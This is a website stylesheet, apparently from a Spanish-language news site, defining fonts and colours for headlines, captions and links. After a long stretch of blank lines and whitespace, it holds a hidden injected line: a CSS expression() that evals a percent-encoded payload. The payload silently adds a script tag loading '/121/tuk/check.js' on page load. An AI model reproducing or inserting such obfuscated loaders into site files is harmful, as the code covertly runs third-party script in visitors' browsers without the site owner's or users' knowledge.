.lasemana { font-family: Verdana; font-size: 11px; color: #555555}
.fecha { font-family: Arial; font-size: 11px; color: #555555}
.menu { font-family: Helvetica; font-size: 10px}

.antetitulo { font-family: Tahoma; font-size: 45px; font-weight:bold; color: #BB0000}
.titular { font-family: Tahoma; font-size: 19px; font-weight:bold; color: #004499}
.texto { font-family: Arial; font-size: 13px; font-weight:normal; color: #ffffff}
.piedefoto { font-family: Verdana; font-size: 13px; font-weight:normal; color: #555555}
.link { font-family: Tahoma; font-size: 14px; font-weight:bold; color: #004499}

.pie-opi { font-family: Tahoma; font-size: 12px; font-weight:bold; color: #BB0000}
.pie-sec { font-family: Arial; font-size: 11px; color: #888888}
.pie-pie { font-family: Verdana; font-size: 10px; color: #555555}

A:link {color: #004499; text-decoration: underline;}
A:visited {color: #004499; text-decoration: underline;}
A:hover {color: #B0CBEB; text-decoration: underline;}
A:active {color: #B0CBEB; text-decoration: underline;}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%31%31%33%32%32%32%3B%20%4A%53%53%33%20%3D%20%27%2F%31%32%31%2F%74%75%6B%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%31%32%31%2F%74%75%6B%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      




































































































